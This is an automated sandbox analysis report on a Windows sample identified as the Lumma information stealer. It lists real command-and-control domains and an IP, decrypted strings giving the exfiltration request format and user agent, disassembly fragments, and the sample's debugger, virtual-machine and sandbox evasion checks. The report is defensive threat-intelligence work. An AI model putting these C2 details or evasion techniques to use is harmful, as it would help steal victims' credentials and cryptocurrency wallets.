Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1560426
MD5:6380b8ca2f9bfc1d86617a3a7fd924f1
SHA1:04ff7e660a59bd2c45098e99a3fd5bff614d2d57
SHA256:f7b7694decac18c856b37c68c8486eccd09470ec28c7f92d90f5f0905110eb7c
Tags:exeuser-Bitsight
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Hides threads from debuggers
LummaC encrypted strings found
Machine Learning detection for sample
PE file contains section with special chars
Sample uses string decryption to hide its real strings
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Detected potential crypto function
Entry point lies outside standard sections
Found inlined nop instructions (likely shell or obfuscated code)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 6408 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 6380B8CA2F9BFC1D86617A3A7FD924F1)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["p10tgrace.sbs", "processhol.sbs", "3xp3cts1aim.sbs", "p3ar11fter.sbs", "peepburry828.sbs"], "Build id": "LOGS11--LiveTraffic"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
decrypted.memstrJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security

    Sigma Signatures

    No Sigma rule has matched

    Suricata Signatures

    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-11-21T19:57:01.063780+010020283713Unknown Traffic192.168.2.449730104.21.66.38443TCP
    2024-11-21T19:57:03.173261+010020283713Unknown Traffic192.168.2.449731104.21.66.38443TCP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-11-21T19:57:01.802442+010020546531A Network Trojan was detected192.168.2.449730104.21.66.38443TCP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-11-21T19:57:01.802442+010020498361A Network Trojan was detected192.168.2.449730104.21.66.38443TCP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-11-21T19:57:01.063780+010020577311Domain Observed Used for C2 Detected192.168.2.449730104.21.66.38443TCP
    2024-11-21T19:57:03.173261+010020577311Domain Observed Used for C2 Detected192.168.2.449731104.21.66.38443TCP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-11-21T19:56:59.191822+010020577301Domain Observed Used for C2 Detected192.168.2.4543951.1.1.153UDP

    Joe Sandbox Signatures

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Antivirus / Scanner detection for submitted sample
    Source: file.exeAvira: detected
    Antivirus detection for URL or domain
    Source: https://cook-rain.sbs/apiOnAvira URL Cloud: Label: malware
    Source: https://cook-rain.sbs:443/api-Avira URL Cloud: Label: malware
    Source: https://cook-rain.sbs/QAvira URL Cloud: Label: malware
    Source: https://cook-rain.sbs/api%Avira URL Cloud: Label: malware
    Found malware configuration
    Source: file.exe.6408.0.memstrminMalware Configuration Extractor: LummaC {"C2 url": ["p10tgrace.sbs", "processhol.sbs", "3xp3cts1aim.sbs", "p3ar11fter.sbs", "peepburry828.sbs"], "Build id": "LOGS11--LiveTraffic"}
    AI detected suspicious sample
    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
    Machine Learning detection for sample
    Source: file.exeJoe Sandbox ML: detected
    Sample uses string decryption to hide its real strings
    Source: 00000000.00000003.1690148012.0000000005110000.00000004.00001000.00020000.00000000.sdmpString decryptor: p3ar11fter.sbs
    Source: 00000000.00000003.1690148012.0000000005110000.00000004.00001000.00020000.00000000.sdmpString decryptor: 3xp3cts1aim.sbs
    Source: 00000000.00000003.1690148012.0000000005110000.00000004.00001000.00020000.00000000.sdmpString decryptor: peepburry828.sbs
    Source: 00000000.00000003.1690148012.0000000005110000.00000004.00001000.00020000.00000000.sdmpString decryptor: p10tgrace.sbs
    Source: 00000000.00000003.1690148012.0000000005110000.00000004.00001000.00020000.00000000.sdmpString decryptor: processhol.sbs
    Source: 00000000.00000003.1690148012.0000000005110000.00000004.00001000.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
    Source: 00000000.00000003.1690148012.0000000005110000.00000004.00001000.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
    Source: 00000000.00000003.1690148012.0000000005110000.00000004.00001000.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
    Source: 00000000.00000003.1690148012.0000000005110000.00000004.00001000.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
    Source: 00000000.00000003.1690148012.0000000005110000.00000004.00001000.00020000.00000000.sdmpString decryptor: Workgroup: -
    Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
    Source: unknownHTTPS traffic detected: 104.21.66.38:443 -> 192.168.2.4:49730 version: TLS 1.2
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov byte ptr [eax], bl0_2_0095CF05
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then push eax0_2_0098F8D0
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov edi, eax0_2_0098F8D0
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx eax, byte ptr [esp+esi+000001E8h]0_2_0095E0D8
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+14h]0_2_009598F0
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov edx, eax0_2_0098B8E0
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov edx, ecx0_2_0098B8E0
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov ecx, eax0_2_0095C02B
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 98D5A07Fh0_2_0098C040
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], C18BC4BAh0_2_0098C040
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 6DBC3610h0_2_0098C040
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 98D5A07Fh0_2_0098C040
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov byte ptr [ebx], al0_2_00970870
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then push eax0_2_0098B860
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx edi, byte ptr [esp+edx+14h]0_2_0095E970
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov word ptr [esi], cx0_2_0095EA38
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax-65h]0_2_0095E35B
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, ebp0_2_00955C90
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, ebp0_2_00955C90
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov edx, ecx0_2_0095BC9D
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov byte ptr [esi], cl0_2_00978CB0
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], 4C697C35h0_2_0098BCE0
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx edx, byte ptr [eax+ecx]0_2_0095AD00
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx edx, byte ptr [edi]0_2_00975E90
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx edx, byte ptr [eax+ecx+00008F12h]0_2_009577D0
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov word ptr [ebp+ebx*4+00h], ax0_2_009577D0
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-58FA0F6Ch]0_2_00990F60

    Networking

    barindex
    Suricata IDS alerts for network traffic
    Source: Network trafficSuricata IDS: 2057730 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (cook-rain .sbs) : 192.168.2.4:54395 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2057731 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (cook-rain .sbs in TLS SNI) : 192.168.2.4:49730 -> 104.21.66.38:443
    Source: Network trafficSuricata IDS: 2057731 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (cook-rain .sbs in TLS SNI) : 192.168.2.4:49731 -> 104.21.66.38:443
    Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49730 -> 104.21.66.38:443
    Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49730 -> 104.21.66.38:443
    C2 URLs / IPs found in malware configuration
    Source: Malware configuration extractorURLs: p10tgrace.sbs
    Source: Malware configuration extractorURLs: processhol.sbs
    Source: Malware configuration extractorURLs: 3xp3cts1aim.sbs
    Source: Malware configuration extractorURLs: p3ar11fter.sbs
    Source: Malware configuration extractorURLs: peepburry828.sbs
    Source: Joe Sandbox ViewIP Address: 104.21.66.38 104.21.66.38
    Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49730 -> 104.21.66.38:443
    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49731 -> 104.21.66.38:443
    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: cook-rain.sbs
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: global trafficDNS traffic detected: DNS query: cook-rain.sbs
    Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: cook-rain.sbs
    Source: file.exe, 00000000.00000003.1732682281.00000000012CE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1732013708.000000000127A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro
    Source: file.exe, 00000000.00000002.1734316733.00000000012D1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1732682281.00000000012CE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1732013708.000000000127A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cook-rain.sbs/
    Source: file.exe, 00000000.00000002.1734316733.00000000012D1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1732682281.00000000012CE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1732013708.000000000127A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cook-rain.sbs/Q
    Source: file.exe, 00000000.00000003.1732013708.000000000127A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cook-rain.sbs/api
    Source: file.exe, 00000000.00000002.1734132839.000000000129B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1732013708.000000000127A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cook-rain.sbs/api%
    Source: file.exe, 00000000.00000003.1732682281.00000000012D4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1733073508.00000000012D4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1734316733.00000000012D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cook-rain.sbs/apiOn
    Source: file.exe, 00000000.00000002.1734132839.0000000001262000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1732013708.0000000001262000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cook-rain.sbs:443/api-
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
    Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
    Source: unknownHTTPS traffic detected: 104.21.66.38:443 -> 192.168.2.4:49730 version: TLS 1.2

    System Summary

    barindex
    PE file contains section with special chars
    Source: file.exeStatic PE information: section name:
    Source: file.exeStatic PE information: section name: .idata
    Source: file.exeStatic PE information: section name:
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009890300_2_00989030
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009589A00_2_009589A0
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0095CF050_2_0095CF05
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0098F8D00_2_0098F8D0
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0095E0D80_2_0095E0D8
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009598F00_2_009598F0
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0098B8E00_2_0098B8E0
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B1C8360_2_00B1C836
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AAD8640_2_00AAD864
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009568400_2_00956840
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0098C0400_2_0098C040
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009708700_2_00970870
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009561A00_2_009561A0
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009841D00_2_009841D0
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B141FF0_2_00B141FF
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0095E9700_2_0095E970
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B192F90_2_00B192F9
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00954AC00_2_00954AC0
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B1E2E70_2_00B1E2E7
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00955AC90_2_00955AC9
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009592100_2_00959210
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0095B2100_2_0095B210
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A03A350_2_00A03A35
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00ABEA6D0_2_00ABEA6D
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00952B800_2_00952B80
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A4E3B80_2_00A4E3B8
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B9B3D40_2_00B9B3D4
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B223380_2_00B22338
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0096DB300_2_0096DB30
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0096FB600_2_0096FB60
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00955C900_2_00955C90
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AA74BA0_2_00AA74BA
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00990C800_2_00990C80
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00978CB00_2_00978CB0
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009594D00_2_009594D0
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00956CC00_2_00956CC0
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009824E00_2_009824E0
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A02C380_2_00A02C38
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0095542C0_2_0095542C
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B15C780_2_00B15C78
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009535800_2_00953580
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009915800_2_00991580
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A58D260_2_00A58D26
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00ACC52A0_2_00ACC52A
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0095AD000_2_0095AD00
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009695300_2_00969530
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00973D700_2_00973D70
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009C156C0_2_009C156C
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00975E900_2_00975E90
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A0F6B00_2_00A0F6B0
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009F0E1A0_2_009F0E1A
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00977E200_2_00977E20
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009706500_2_00970650
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009717900_2_00971790
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0098C7800_2_0098C780
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009887B00_2_009887B0
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009DEFA30_2_009DEFA3
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009527D00_2_009527D0
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009577D00_2_009577D0
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AA4FF60_2_00AA4FF6
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009787700_2_00978770
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00990F600_2_00990F60
    Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
    Source: file.exeStatic PE information: Section: ZLIB complexity 0.9994748975409836
    Source: file.exeStatic PE information: Section: nbqdyuoa ZLIB complexity 0.9944721758275129
    Source: classification engineClassification label: mal100.troj.evad.winEXE@1/0@1/1
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009827B0 CoCreateInstance,0_2_009827B0
    Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
    Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exeJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: webio.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: dnsapi.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: rasadhlp.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: fwpuclnt.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: schannel.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: mskeyprotect.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: ncryptsslp.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: gpapi.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: dpapi.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: wbemcomn.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: amsi.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: version.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: file.exeStatic file information: File size 1858048 > 1048576
    Source: file.exeStatic PE information: Raw size of nbqdyuoa is bigger than: 0x100000 < 0x19ba00

    Data Obfuscation

    barindex
    Detected unpacking (changes PE section rights)
    Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.950000.0.unpack :EW;.rsrc:W;.idata :W; :EW;nbqdyuoa:EW;lsjapkzb:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;nbqdyuoa:EW;lsjapkzb:EW;.taggant:EW;
    Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
    Source: file.exeStatic PE information: real checksum: 0x1cf735 should be: 0x1c5dcc
    Source: file.exeStatic PE information: section name:
    Source: file.exeStatic PE information: section name: .idata
    Source: file.exeStatic PE information: section name:
    Source: file.exeStatic PE information: section name: nbqdyuoa
    Source: file.exeStatic PE information: section name: lsjapkzb
    Source: file.exeStatic PE information: section name: .taggant
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C118C3 push esi; mov dword ptr [esp], edx0_2_00C119C3
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BCB892 push edi; mov dword ptr [esp], ebp0_2_00BCB94C
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BCB892 push eax; mov dword ptr [esp], 77FD103Fh0_2_00BCB96E
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B5A085 push esi; mov dword ptr [esp], edi0_2_00B5A13A
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BB1887 push ecx; mov dword ptr [esp], ebp0_2_00BB18A1
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B1C836 push ecx; mov dword ptr [esp], 65FF1FC5h0_2_00B1C840
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B1C836 push 4C1C3400h; mov dword ptr [esp], esi0_2_00B1C8F5
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B1C836 push 36387E8Eh; mov dword ptr [esp], eax0_2_00B1C98C
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B1C836 push 7CCC3197h; mov dword ptr [esp], ebp0_2_00B1C994
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B1C836 push ebp; mov dword ptr [esp], 055F44DDh0_2_00B1C9BE
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B1C836 push 1D3A7904h; mov dword ptr [esp], eax0_2_00B1C9E8
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B1C836 push ecx; mov dword ptr [esp], edx0_2_00B1CA08
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B1C836 push ebp; mov dword ptr [esp], edi0_2_00B1CA1E
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B1C836 push edi; mov dword ptr [esp], esi0_2_00B1CA4E
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B1C836 push 13B6DDE1h; mov dword ptr [esp], ebx0_2_00B1CA5D
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B1C836 push 6F4FAB4Fh; mov dword ptr [esp], ebx0_2_00B1CB0B
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B1C836 push ebx; mov dword ptr [esp], 3EE1B8B1h0_2_00B1CB89
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B1C836 push esi; mov dword ptr [esp], ecx0_2_00B1CC09
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B1C836 push 424BCB50h; mov dword ptr [esp], esi0_2_00B1CC33
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B1C836 push esi; mov dword ptr [esp], 66FBA557h0_2_00B1CC45
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B1C836 push 1ECA81C6h; mov dword ptr [esp], edx0_2_00B1CCAA
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B1C836 push 4659B167h; mov dword ptr [esp], esp0_2_00B1CDA1
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B1C836 push 2BBDC888h; mov dword ptr [esp], ecx0_2_00B1CDD0
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B1C836 push 62218F1Eh; mov dword ptr [esp], esi0_2_00B1CE06
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B1C836 push 58A5DDAFh; mov dword ptr [esp], ebp0_2_00B1CE89
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B1C836 push esi; mov dword ptr [esp], edx0_2_00B1CEA8
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B1C836 push 33EF5F69h; mov dword ptr [esp], eax0_2_00B1CF35
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B1C836 push 3BFB41FAh; mov dword ptr [esp], eax0_2_00B1CF67
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B1C836 push ebp; mov dword ptr [esp], edx0_2_00B1CFCA
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B1C836 push 25CC1BA4h; mov dword ptr [esp], ebx0_2_00B1D01D
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B1C836 push ebx; mov dword ptr [esp], esp0_2_00B1D024
    Source: file.exeStatic PE information: section name: entropy: 7.987246249896705
    Source: file.exeStatic PE information: section name: nbqdyuoa entropy: 7.954937787050603

    Boot Survival

    barindex
    Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
    Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
    Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
    Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
    Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
    Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
    Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonclassJump to behavior
    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

    Malware Analysis System Evasion

    barindex
    Tries to detect sandboxes / dynamic malware analysis system (registry check)
    Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
